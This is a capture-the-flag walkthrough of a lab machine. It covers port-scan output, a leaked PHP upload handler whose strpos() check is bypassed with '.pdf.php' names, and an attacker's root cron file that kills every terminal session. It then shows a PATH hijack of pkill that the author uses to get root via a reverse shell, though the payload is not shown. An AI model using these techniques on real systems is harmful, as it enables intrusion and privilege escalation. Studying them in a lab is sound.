└─[$] rustscan -t 2000 -a 10.10.33.194 -- -sC -sV
-----..-..-..----..---..----..---..--..-..-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| ||.-. \| {_}|.-._}}||.-._}}\ }//\ \| |\|`-' `-'`-----'`----'`-' `----' `---' `-'`-'`-' `-'The Modern Day Port Scanner.________________________________________: https://discord.gg/GFrQsGy :: https://github.com/RustScan/RustScan : --------------------------------------0day was here ♥[~] The config file is expected to be at "/home/dragon/.rustscan.toml"[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.33.194:22Open 10.10.33.194:80[~] Starting Script(s)[>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV" on ip 10.10.33.194Depending on the complexity of the script, results may take some time to appear.[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-16 15:36 IST<<--SNIP-->>PORT STATE SERVICE REASON VERSION22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEwViZRbXUs9kag3j00D1FtRrtg3PKTSXGdTaJC14E+FWVLUKxlCTbI89GtFCqL22nDVi3nmG5QQDxEfl4zTOIgZXi4FXst0ZfzMayH8T+t9jSc2OlCuIyZYyw+JDP2G+WJXHC67BSthXTt9eMeDPxi7r03GA0nqMSFJ8lw5FqTnzyacLne5ojiB/atnHpVXa0DoSmT+w8t1Pk3nhnk0zrlOxVOfkx8Jze8NHynP4BFr/Ea3PNvvmJ2hpRUgO3IGVQ3bt55ab3ZoFy344Fy5ISsYXYQJBeLUhu2GVeCihzgUFkecKZEUhnc0S8Idy5EnDWeEaRQjE832gKvUJ9d0PIEN8sTxgSEp1RcijMm8/2vEWzeRVAKaHCaU8lV/jbtyl6s5jgkStuy6NwqpWf24D0TydU5jwsjGTLWJbrDNsYbP28qas0o2+zwmzqwaOJMwuk0CYVZCcd2qGVRRxYu6NhfIudRPMLPp/EvhfEUPoYR6tmX42pvpqNH70kotCiQiM=
| 256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMZXOzdGFYNrQPBrILKG3Zd+DlWWE133ONnKOGm3MhuTgWZjEkYI1g5pn6ggVCnJwZHgvkvjSudcCImNk92yW7g=
| 256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEznWyrDbdSTIAxhoKlcRP8mZ/LX/wQSAvofU1MLracp80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-favicon: Unknown favicon MD5: DD1493059959BA895A46C026C39C36EF| http-methods: |_ Supported Methods: GET POST OPTIONS HEAD|_http-title: RecruitSec: Industry Leading Infosec RecruitmentService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel<<--SNIP-->>ead data files from: /usr/bin/../share/nmapService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.48 seconds
Seeing all those directory nothing found to be useful
After uploading a pdf file in the upload section we can see the source code in intercepted request
HTTP/1.1 200 OKDate: Tue, 16 Aug 2022 10:55:12 GMTServer: Apache/2.4.41 (Ubuntu)Vary: Accept-EncodingContent-Length: 552Connection: closeContent-Type: text/html; charset=UTF-8Hacked! If you dont want me to upload my shell, do better at filtering!<!-- seriously, dumb stuff:$target_dir = "cvs/";$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);if (!strpos($target_file, ".pdf")) { echo "Only PDF CVs are accepted.";} else if (file_exists($target_file)) { echo "This CV has already been uploaded!";} else if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "Success! We will get back to you.";} else { echo "Something went wrong :|";}-->
I tried to upload a pdf file but it returned the same response which made me think that the hacker must have used the same technique to bypass the filteration and got the shell onto the servers, which means that the hacker has a shell/payload on the server which we can use and get a shell.
As the server uses PHP and we saw the source code as well, the upload program uses strpos() so, as long the filename has .php in it we are good to go.
I fuzzed the /cvs with guessing the extension .pdf.php
└─[$] ssh lachlan@10.10.117.45
Theauthenticityofhost'10.10.117.45 (10.10.117.45)'can't be established.ED25519 key fingerprint is SHA256:2RN2fsvo4NewQ4PV/D/U+gbDQND2ckUUnofzShfqqJk.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.117.45' (ED25519) to the list of known hosts.lachlan@10.10.117.45'spassword:WelcometoUbuntu20.04.4LTS (GNU/Linux 5.4.0-109-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantageSysteminformationasofTue16Aug202211:57:49AMUTCSystemload:0.24Processes:121Usageof/:25.6%of9.78GBUsersloggedin:0Memoryusage:52%IPv4addressforeth0:10.10.117.45Swapusage:0%0updatescanbeappliedimmediately.Thelistofavailableupdatesismorethanaweekold.Tocheckfornewupdatesrun:sudoaptupdateLastlogin:ThuMay504:39:192022from192.168.56.1$nopeConnectionto10.10.117.45closed.
let's check out the file hackers might have edited that we noticed in the .bash_history
command>cat/etc/cron.d/persistencePATH=/home/lachlan/bin:/bin:/usr/bin# * * * * * root backup.sh* * * * * root /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
As you can see the cronjob runs after every 10 seconds and echo's nope in /dev/pts
what is /dev/pts?
Consider as this file contains data of the current terminal
For better understanding you can type tty in your current shell and type echo hello > /dev/pts/<shell_no> in a new shell and you can see the hello on your current shell.
Hmmmm, what next?
Now as we can see the $PATH variable is declared inside the cron file...
PATH=/home/lachlan/bin:/bin:/usr/bin
So first the binaries will checkout in /home/lachlan/bin then /bin followed by /usr/bin
User Shell
As all the binary in the cronjob use absolute paht pkill is using relative path, that means if we create a binary named pkill in our home directory we can bypass it's effects.
As we can see we have successfully edited the pkill
Lets try for the shell
└─[$] ssh lachlan@10.10.19.188
lachlan@10.10.19.188's password: Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue 16 Aug 2022 02:01:14 PM UTC System load: 0.29 Processes: 126 Usage of /: 25.0% of 9.78GB Users logged in: 0 Memory usage: 48% IPv4 address for eth0: 10.10.19.188 Swap usage: 0%0 updates can be applied immediately.The list of available updates is more than a week old.To check for new updates run: sudo apt updateFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settingsLast login: Thu May 5 04:39:19 2022 from 192.168.56.1$ bashlachlan@b2r:~$ lachlan@b2r:~$ iduid=1001(lachlan) gid=1001(lachlan) groups=1001(lachlan)lachlan@b2r:~$ nopelachlan@b2r:~$
We still have echo nope but we the shell remains.
Root shell
As the pkill and other cronjob service runs after every 10 seconds with root privileges we can edit ./bin/pkill and get the root shell.
Editing and adding revshell payload inside /home/lachlan/bin/pkill